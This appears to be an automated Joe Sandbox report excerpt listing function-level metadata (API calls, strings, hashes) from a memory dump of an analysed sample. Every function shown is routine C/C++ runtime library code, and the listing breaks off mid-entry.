Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b00ae002dc55fb4e625dd24f5a9641755cf84b69f0189ba72e1364eef460e8
Instruction ID: 6fa0a1bee6cd81a0e7ee55e180bb11495692cb872df1a59e9b59285b5741de68
Opcode Fuzzy Hash: 05b00ae002dc55fb4e625dd24f5a9641755cf84b69f0189ba72e1364eef460e8
Instruction Fuzzy Hash: 4CA00138A883028B8209CE14E690875F3B8A74F602F103954E949B3216C620E8048A2E

Function 00EC53B1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00EC53B8
std::_Lockit::_Lockit.LIBCPMT ref: 00EC53C2
int.LIBCPMT ref: 00EC53D9

Part of subcall function 00EC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00EC16C5
Part of subcall function 00EC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00EC16DF

std::_Facet_Register.LIBCPMT ref: 00EC5413
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC5433
Concurrency::cancel_current_task.LIBCPMT ref: 00EC5440

Strings

R[, xrefs: 00EC5420

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: R[
API String ID: 55977855-3972925902
Opcode ID: 3f743fe61a6ec23d2e8742b1d8509e1b48e954c53b981a5e15c6e24de46dcbc7
Instruction ID: 6c059ecd3f9588cd005af33568618c611df4cc713f54a04dfa94c352dd8f49a8
Opcode Fuzzy Hash: 3f743fe61a6ec23d2e8742b1d8509e1b48e954c53b981a5e15c6e24de46dcbc7
Instruction Fuzzy Hash: A51102729006188BCB14EB64CA06FAE77F5AF85321F14104DF805B7391CF72AE828B81

Function 00ED0F50 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5E21696A,?,?,00000000,00EE1FC8,000000FF,?,00ED0EE0,00ED1010,?,00ED0EB4,00000000), ref: 00ED0F85
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00ED0F97
FreeLibrary.KERNEL32(00000000,?,?,00000000,00EE1FC8,000000FF,?,00ED0EE0,00ED1010,?,00ED0EB4,00000000), ref: 00ED0FB9

Strings

CorExitProcess, xrefs: 00ED0F8F
mscoree.dll, xrefs: 00ED0F7E
R[, xrefs: 00ED0FA8
ji!^, xrefs: 00ED0F65

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$R[$ji!^$mscoree.dll
API String ID: 4061214504-3442945953
Opcode ID: 45cfa159e831fa9961edb4e76acfc4a1037262c81d94dab6182decb63c670782
Instruction ID: 5490b868871644aab4132b4a376d722afe8eb096516f3efb8467e04385203221
Opcode Fuzzy Hash: 45cfa159e831fa9961edb4e76acfc4a1037262c81d94dab6182decb63c670782
Instruction Fuzzy Hash: 1C016231A0479DEFDB218B61DC49FAEBBB8FB44B14F04052AF811B66D0DB749A04CA90

Function 00ED7747 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(5E21696A,00000000,00000000,00000000), ref: 00ED77AA

Part of subcall function 00ED952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00ED8FD3,?,00000000,-00000008), ref: 00ED95D6

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00ED7A05
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00ED7A4D
GetLastError.KERNEL32 ref: 00ED7AF0

Strings

v , xrefs: 00ED79CB, 00ED7A13, 00ED7A6E, 00ED793A, 00ED7A83, 00ED78E6
ji!^, xrefs: 00ED775D

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID: ji!^$v
API String ID: 2112829910-2903977144
Opcode ID: 7759f9e14dc1827d607648418b46ee828cdd8b4250804de25238b03be87de880
Instruction ID: 5606395b130213a2d43c7aa5256a5a869be42220166434a4817b025c71432463
Opcode Fuzzy Hash: 7759f9e14dc1827d607648418b46ee828cdd8b4250804de25238b03be87de880
Instruction Fuzzy Hash: 57D168B5D042589FCB15CFA8D8809EDBBB5FF49314F18426AE8A5FB351E730A942CB50

Function 00ECA5C8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00ECA6E7
___TypeMatch.LIBVCRUNTIME ref: 00ECA7F5
CallUnexpected.LIBVCRUNTIME ref: 00ECA962

Strings

csm, xrefs: 00ECA672
csm, xrefs: 00ECA605
csm, xrefs: 00ECA71E

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: c1e2f6ed4f1ecd71c48a61727f3e7a1660ff04f2e215267fec0cda6058251cba
Instruction ID: 0179a00c701696c2a7e3884cabd1386b0f0c5182b9da10733f3efe31f50516c3
Opcode Fuzzy Hash: c1e2f6ed4f1ecd71c48a61727f3e7a1660ff04f2e215267fec0cda6058251cba
Instruction Fuzzy Hash: 68B15C7280020DDFCF18DFA4CA45EAEB7B5BF04318B18616EE8117B212D732D952CB92

Function 00ED5F4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,5E21696A,?,00ED6057,00ECC446,?,F8250000,00000000), ref: 00ED600B

Strings

api-ms-, xrefs: 00ED5FA1
ext-ms-, xrefs: 00ED5FB5

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: df2f4886df8208c8d54c7b548d885e81a30775a89bf7ec27e85989d85b96f1ef
Instruction ID: 176705d49d56c3cee12f7f85cd09c3d9690c0de446d6fc4b876af0cdaab07039
Opcode Fuzzy Hash: df2f4886df8208c8d54c7b548d885e81a30775a89bf7ec27e85989d85b96f1ef
Instruction Fuzzy Hash: FB21E736B01614ABC7319B75DC84A5E7768EB527A4B242116F915BF3D0DB30EE06C6D0

Function 00EC507A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00EC5081
std::_Lockit::_Lockit.LIBCPMT ref: 00EC508C
std::locale::_Setgloballocale.LIBCPMT ref: 00EC50A7
_Yarn.LIBCPMT ref: 00EC50BD
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC50FA

Strings

R[, xrefs: 00EC50C9, 00EC50ED

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
String ID: R[
API String ID: 156189095-3972925902
Opcode ID: b186a5a9f1f606c1db2f614193151e4eac13738f92d893cc53f88b4953580b8d
Instruction ID: b514304e22f2c8d18dde8174f586d92ce77f2aec0664098c867d2ee5686a5d83
Opcode Fuzzy Hash: b186a5a9f1f606c1db2f614193151e4eac13738f92d893cc53f88b4953580b8d
Instruction Fuzzy Hash: 45019E76A016988BD706AB209956F7C7BA1AB95340B18500DFC4167391CB36AE42DF82

Function 00EDF356 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd8def89168923ca19d3264cb3e191f3083b0821f9191175f6bac02b970c115
Instruction ID: c9f5fe68bf69766cdb2349112a877568c2bb81fba20c25a2bfc6e93d5277717e
Opcode Fuzzy Hash: 1bd8def89168923ca19d3264cb3e191f3083b0821f9191175f6bac02b970c115
Instruction Fuzzy Hash: 8FB1F370A042099FDB11DFA8D880BAD7BB1EF55314F1451AAE812BB3A2D771DD43CBA1

Function 00ECA25A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00ECA251,00EC8978,00EC7AFF), ref: 00ECA268
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00ECA276
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00ECA28F
SetLastError.KERNEL32(00000000,00ECA251,00EC8978,00EC7AFF), ref: 00ECA2E1

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: cb58c3b3ca0a1702fd6cdfe9c1fbc95515a45c5694e67699c892e221c2754c91
Instruction ID: 8b8f68d1a4c60dbc6afae9fe357206483b5a67353269126ae70a549cb99d58cb
Opcode Fuzzy Hash: cb58c3b3ca0a1702fd6cdfe9c1fbc95515a45c5694e67699c892e221c2754c91
Instruction Fuzzy Hash: F201D23250C3696EA6382775BE86F6A278AEB0277CB28123DF010790F1FB134D0B5142

Function 00ECA371 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00ECA438
___AdjustPointer.LIBCMT ref: 00ECA45B
___AdjustPointer.LIBCMT ref: 00ECA4F7

Strings

R[, xrefs: 00ECA3D0

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID: R[
API String ID: 1740715915-3972925902
Opcode ID: 29f89773e152a4ac77a69aa9ae45a01dc20a9a9c09fe8a3a676b958f876000a4
Instruction ID: 9f93ded9ec7493735e0c616aeeeed48e97a3775cf42a595fd009474a413c45f9
Opcode Fuzzy Hash: 29f89773e152a4ac77a69aa9ae45a01dc20a9a9c09fe8a3a676b958f876000a4
Instruction Fuzzy Hash: 6851027260031A9FDB298F54DA45FBA73A5FF00318F18503DE821A7291E773AC52CB92

Function 00ECA060 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00ECA09F
__IsNonwritableInCurrentImage.LIBCMT ref: 00ECA153

Strings

R[, xrefs: 00ECA16C
csm, xrefs: 00ECA13D
ji!^, xrefs: 00ECA112, 00ECA18F

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: R[$csm$ji!^
API String ID: 3480331319-1814296812
Opcode ID: 9d91c8b6e7b6bd60077203e2cff5198376260fcec42cfab9d4ded893bfd55c42
Instruction ID: 6c058a368a76c2dba7e9227ca93e5f05acfd47ca0946a73946e2358a738dbb86
Opcode Fuzzy Hash: 9d91c8b6e7b6bd60077203e2cff5198376260fcec42cfab9d4ded893bfd55c42
Instruction Fuzzy Hash: C441A470A0124C9FCF10DF69C981F9EBBE5AF45318F189169E814BB351C7329E46CB92

Function 00EC4436 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EC4442
int.LIBCPMT ref: 00EC4455

Part of subcall function 00EC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00EC16C5
Part of subcall function 00EC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00EC16DF

std::_Facet_Register.LIBCPMT ref: 00EC4488
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC449E
Concurrency::cancel_current_task.LIBCPMT ref: 00EC44A9

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 17e6b1f94df50692d54d977150f45078c79e498dce29a2fb000df35b10e10faf
Instruction ID: f890cc5606c1a5dcd90647f56534f1233bca53a2a2c3b98c871f4a39d16d79cf
Opcode Fuzzy Hash: 17e6b1f94df50692d54d977150f45078c79e498dce29a2fb000df35b10e10faf
Instruction Fuzzy Hash: 4001D4B6500214ABCB28AB64DA15FAD7BA8AF91360B24154DFC15B7291DB329E03D780

Function 00EC3DB1 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EC3DBD
int.LIBCPMT ref: 00EC3DD0

Part of subcall function 00EC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00EC16C5
Part of subcall function 00EC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00EC16DF

std::_Facet_Register.LIBCPMT ref: 00EC3E03
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC3E19
Concurrency::cancel_current_task.LIBCPMT ref: 00EC3E24

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 3df43135f9e43b70a340c0f5618af0cf83a0ecdb617122aee7c27408eb430e67
Instruction ID: c89dc8c591f16b79ddec913230b424db6a4b1c82e39715ef7126602904fb7f3c
Opcode Fuzzy Hash: 3df43135f9e43b70a340c0f5618af0cf83a0ecdb617122aee7c27408eb430e67
Instruction Fuzzy Hash: C501A776904214ABCB25BF64DA05EAD7BE8DF51760B14118DFC02B7292DB32AF03D780

Function 00EC4308 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EC4315
int.LIBCPMT ref: 00EC4328

Part of subcall function 00EC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00EC16C5
Part of subcall function 00EC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00EC16DF

std::_Facet_Register.LIBCPMT ref: 00EC435B
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC4371
Concurrency::cancel_current_task.LIBCPMT ref: 00EC437C

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: d76118fcfe06c4dea4aef1c20eeec7fc62482b04bdcc988a16476580e5fcc320
Instruction ID: acd46c7b67e0354ad6ccc880d541673a61473481f35446bff884fee639cf8d60
Opcode Fuzzy Hash: d76118fcfe06c4dea4aef1c20eeec7fc62482b04bdcc988a16476580e5fcc320
Instruction Fuzzy Hash: F501D476900618A7CB14BB689A11EED7BA4AFD1710B10215DEC01B72D1DB319E47D780

Function 00EC5F4D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

_Fputc.LIBCPMT ref: 00EC6026

Strings

R[, xrefs: 00EC6005
ji!^, xrefs: 00EC5F53

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Fputc
String ID: R[$ji!^
API String ID: 3078413507-2741366427
Opcode ID: c90d563abb79d72a8e3624871354ca4b59ad4f89b6ebb942410682bd00f4a45d
Instruction ID: 2bc4036ad8c1fffcaee3be04cf51328706ec940927a636f8cb4da927e207891a
Opcode Fuzzy Hash: c90d563abb79d72a8e3624871354ca4b59ad4f89b6ebb942410682bd00f4a45d
Instruction Fuzzy Hash: 50416032A1065AABCB28DF64C640EEDB7B9FF08354B14502EE541B7650E732FD92CB90

Function 00ECB3A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00ECB353,00000000,?,00F46AE4,?,?,?,00ECB4F6,00000004,InitializeCriticalSectionEx,00EE4BD8,InitializeCriticalSectionEx), ref: 00ECB3AF
GetLastError.KERNEL32(?,00ECB353,00000000,?,00F46AE4,?,?,?,00ECB4F6,00000004,InitializeCriticalSectionEx,00EE4BD8,InitializeCriticalSectionEx,00000000,?,00ECB2AD), ref: 00ECB3B9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00ECB3E1

Strings

api-ms-, xrefs: 00ECB3C6

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b4e7673223455bed37201a2f6dd9b9a3c58798056fd3665498f5efbb45f3b8f7
